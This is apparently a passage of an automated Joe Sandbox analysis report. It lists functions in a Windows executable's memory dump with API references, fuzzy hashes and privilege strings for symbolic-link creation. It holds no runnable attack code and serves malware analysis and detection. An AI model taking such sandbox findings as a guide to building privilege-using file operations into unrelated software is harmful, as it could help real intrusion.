Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 80c6c1208725552e31fdb6002efde339e96468cf926a0bcef41ca708b735937a
Instruction ID: 6b624a32d70dbb922338cc0b3781f4eefed7d58673feffa2e4e50e091967e3d2
Opcode Fuzzy Hash: 80c6c1208725552e31fdb6002efde339e96468cf926a0bcef41ca708b735937a
Instruction Fuzzy Hash: 7151D36AB1C692D0EB16BB25D4443AAA751FB86BC5F840136EF4D07392DFBDE485C320

Function 00007FF741E9E7A8 Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF741EA3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF741EB0811), ref: 00007FF741EA3EFD

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9E993

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: CloseFind_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1011579015-0
Opcode ID: e982e273b1865209a75a3cfd535ad9023e3388265a11ab7418cbf5dec2d39955
Instruction ID: 4c23b33d4b598a4d0c32eedc54ecf6967c609a09c289d5be075916b370498aa7
Opcode Fuzzy Hash: e982e273b1865209a75a3cfd535ad9023e3388265a11ab7418cbf5dec2d39955
Instruction Fuzzy Hash: 49516226B1C6A6C1FB62BF64D44536EA361FB85B85F880136EB4D0B6A5DFACD441C320

Function 00007FF741EA1794 Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA187D

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 9385cba53fa6208ca460e05f3a710e61ac95cb77221bf3bd1eb05f532c4ae120
Instruction ID: 66fe660cedf2e90c9430b5ca0b16c0d88acbd696dbe6ff001fc0c61ba23819db
Opcode Fuzzy Hash: 9385cba53fa6208ca460e05f3a710e61ac95cb77221bf3bd1eb05f532c4ae120
Instruction Fuzzy Hash: E841D666B1CAA182EB15BB17AA44379E251FB44FC1F888535EE5C0BF5ADFBCD4518300

Function 00007FF741EA2F58 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA30C8

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: c12ddbc590a903591de313708f19a8cb728d3d3f41945339a7b2dbf0642da7e2
Instruction ID: 404b432d195010325c688b4c02dfa58f479d36b15292887037f5bbd17142d978
Opcode Fuzzy Hash: c12ddbc590a903591de313708f19a8cb728d3d3f41945339a7b2dbf0642da7e2
Instruction Fuzzy Hash: 9841F76AA0C712C1EF11BB25E685379A361FB85BD5F940134EA5D07799DFBDD440C220

Function 00007FF741ECBDF8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF741ECBE20

Part of subcall function 00007FF741ECBFB0: GetModuleHandleExW.KERNEL32 ref: 00007FF741ECBFD0
Part of subcall function 00007FF741ECBFB0: GetProcAddress.KERNEL32 ref: 00007FF741ECBFE6
Part of subcall function 00007FF741ECBFB0: FreeLibrary.KERNEL32 ref: 00007FF741ECC00B

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
Instruction ID: 9b15e7129eb765a174a1f0431437c4646a73c6826c1790d96938f96c43751276
Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
Instruction Fuzzy Hash: 8141F329B1C677C6FB16BB119C40138A260BF54B82FC44036EA0D076E1EFBDE842CB60

Function 00007FF741E9129C Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF741E91396

Part of subcall function 00007FF741E91F80: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF741E91F89

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
String ID:
API String ID: 680105476-0
Opcode ID: 3234b2b5ac3a40deddea539940c0fe254cec77c5e42e079e7c739459eb3fc390
Instruction ID: e7c00eb009392e59bd641d999e2ba0fedb386ba8e3c285c0e76b1ad3dce72c8e
Opcode Fuzzy Hash: 3234b2b5ac3a40deddea539940c0fe254cec77c5e42e079e7c739459eb3fc390
Instruction Fuzzy Hash: A721A126A1C361C5EB15FB52A5002B9A260BB06BF1FA90B30DE7D07BC1DFBDE0518310

Function 00007FF741ED124C Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF741ED1280

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
Instruction ID: a4ce3011ec68f766bca859775bdfc9acd7170208344a0feac72e95201cf68224
Opcode Fuzzy Hash: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
Instruction Fuzzy Hash: EE118479A1C663C2F712BB50A440639F294FB40785FD80134EA9D87695DFBEE400D760

Function 00007FF741EBFC68 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF741EBF0A4: GetDlgItem.USER32 ref: 00007FF741EBF0E3
Part of subcall function 00007FF741EBF0A4: ShowWindow.USER32 ref: 00007FF741EBF109
Part of subcall function 00007FF741EBF0A4: SendMessageW.USER32 ref: 00007FF741EBF11E
Part of subcall function 00007FF741EBF0A4: SendMessageW.USER32 ref: 00007FF741EBF136
Part of subcall function 00007FF741EBF0A4: SendMessageW.USER32 ref: 00007FF741EBF157
Part of subcall function 00007FF741EBF0A4: SendMessageW.USER32 ref: 00007FF741EBF173
Part of subcall function 00007FF741EBF0A4: SendMessageW.USER32 ref: 00007FF741EBF1B6
Part of subcall function 00007FF741EBF0A4: SendMessageW.USER32 ref: 00007FF741EBF1D4
Part of subcall function 00007FF741EBF0A4: SendMessageW.USER32 ref: 00007FF741EBF1E8
Part of subcall function 00007FF741EBF0A4: SendMessageW.USER32 ref: 00007FF741EBF212
Part of subcall function 00007FF741EBF0A4: SendMessageW.USER32 ref: 00007FF741EBF22A

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBFD03

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: MessageSend$ItemShowWindow_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1587882848-0
Opcode ID: 98356bcfc0f9eb0b54ad4562f3e8dfcdedede25df190cb48db04b7e24fbe0ebe
Instruction ID: 59a8e2f555a898add57e0dd23e81bde3c1fb3da2dc4bcd12d615a2c017e38940
Opcode Fuzzy Hash: 98356bcfc0f9eb0b54ad4562f3e8dfcdedede25df190cb48db04b7e24fbe0ebe
Instruction Fuzzy Hash: 5A01C86AA2C69681EB15F724D44537DA311FF89795F900331EAAC066D6EFACE0808614

Function 00007FF741E93AD8 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E93B6C

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: dd833eb704b03c62a36fea145c0b0b4abee32047d89ef2e694e61e0216d7ee09
Instruction ID: b0318c1e17a942ddb89b05e2243a3d7c568d4b0f96351cf487c266ee695f809d
Opcode Fuzzy Hash: dd833eb704b03c62a36fea145c0b0b4abee32047d89ef2e694e61e0216d7ee09
Instruction Fuzzy Hash: 15010866E2C796C1EB12B728E44122DB361FB89791FC04331E6AD077A5EFACD0408704

Function 00007FF741EC1558 Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF741EC1604: GetModuleHandleW.KERNEL32(?,?,?,00007FF741EC1573,?,?,?,00007FF741EC192A), ref: 00007FF741EC162B

DloadProtectSection.DELAYIMP ref: 00007FF741EC15C9

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: DloadHandleModuleProtectSection
String ID:
API String ID: 2883838935-0
Opcode ID: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
Instruction ID: 9e15cdb8b9463e4c422d4257708b63067bc27425c433e5a2607d4445c80262e1
Opcode Fuzzy Hash: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
Instruction Fuzzy Hash: 5411FA68F4C527D2FB63BB05A854B70A351BF2434BFD85034CA0D462A5FFADA49AC620

Function 00007FF741EA3EC8 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF741EA40BC: FindFirstFileW.KERNELBASE ref: 00007FF741EA410B
Part of subcall function 00007FF741EA40BC: FindFirstFileW.KERNEL32 ref: 00007FF741EA415E
Part of subcall function 00007FF741EA40BC: GetLastError.KERNEL32 ref: 00007FF741EA41AF

FindClose.KERNELBASE(?,?,00000000,00007FF741EB0811), ref: 00007FF741EA3EFD

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
Instruction ID: c2a2a29946e3c052ea77a563b2bd9a4593ae2a439781aae3ddb0378698cb390e
Opcode Fuzzy Hash: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
Instruction Fuzzy Hash: E5F0F46A90C241C6EB21BFB0E2001B8B760AB05BF5F585334EA7D073C7CE68D4848760

Function 00007FF741EA273C Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE ref: 00007FF741EA2755

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 182d9e1e92039184aab4081fafd09b1cf385b4bd914a3c272b872952a66d9790
Instruction ID: 3a8e87eb18237afa489366e3a174fa20197506925904aff875c51c32ae091bd1
Opcode Fuzzy Hash: 182d9e1e92039184aab4081fafd09b1cf385b4bd914a3c272b872952a66d9790
Instruction Fuzzy Hash: 0EE08619B18526C1EF21BB26C8415345321BF48BC6B885030DE0C07761CF28C4818710

Function 00007FF741EA2490 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE ref: 00007FF741EA24A2

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
Instruction ID: 19109f78b3e66ce9e769d3987f91befb3775b807d9b6072a570e71ff8d1d19c1
Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
Instruction Fuzzy Hash: 7DD0C92AA0D462C2EA11B636985103C6360BF92776FE40720D63E916E2CA5D9496A221

Function 00007FF741ECFA04 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 00007FF741ECFA59

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
Instruction ID: 6e674a6dbf2c8611888d5340fb3959df47dda023d7e87c7a0c1aa1003ad5648a
Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
Instruction Fuzzy Hash: D6F03C58B0D227C5FF5A76699D113B4D2907F44B86F885430C94E46391FFACE581C230

Function 00007FF741ECD94C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 00007FF741ECD98A

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
Instruction ID: a19229960b0cd9890c7250a9186b6c9fe5c29bb1f6b5b0666098d57abfc0616d
Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
Instruction Fuzzy Hash: F6F03A1CA0D267C4FF5676615C002B492917F887A2F8C1630D96E862C1EFDDE481E2B0

Function 00007FF741EA20D0 Relevance: 1.3, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,00000001,00007FF741EA207E), ref: 00007FF741EA20F6

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
Instruction ID: e7ea5822f6e52738d605a019e04d9d73960d8852bb3da45becfa2c8d6d5cfe60
Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
Instruction Fuzzy Hash: BBF08629A0C553D5FB25BB20D441279A7A1F724BBAF894334D73C051D5DE68D8958320

Non-executed Functions

Function 00007FF741E9C2F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 754fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF741E9DE04: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF741E9CF4B), ref: 00007FF741E9DE27
Part of subcall function 00007FF741E9DE04: GetLastError.KERNEL32 ref: 00007FF741E9DE88
Part of subcall function 00007FF741E9DE04: CloseHandle.KERNEL32 ref: 00007FF741E9DE9B

wcscpy.LIBCMT ref: 00007FF741E9CBC8
wcscpy.LIBCMT ref: 00007FF741E9CBFE
CreateFileW.KERNEL32 ref: 00007FF741E9CC38
DeviceIoControl.KERNEL32 ref: 00007FF741E9CD01
CloseHandle.KERNEL32 ref: 00007FF741E9CD12
GetLastError.KERNEL32 ref: 00007FF741E9CD2E
RemoveDirectoryW.KERNEL32 ref: 00007FF741E9CD7D
DeleteFileW.KERNEL32 ref: 00007FF741E9CD88
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9CE89
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9CE8F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9CE9B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9CEA1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9CEAD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9CEB3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9CEB9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9CEBF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9CEC5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9CECB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9CED1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9CED7

Strings

SeRestorePrivilege, xrefs: 00007FF741E9C343
\??\, xrefs: 00007FF741E9C392, 00007FF741E9C3B8
SeCreateSymbolicLinkPrivilege, xrefs: 00007FF741E9C34F
UNC\, xrefs: 00007FF741E9C53F, 00007FF741E9C55D

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
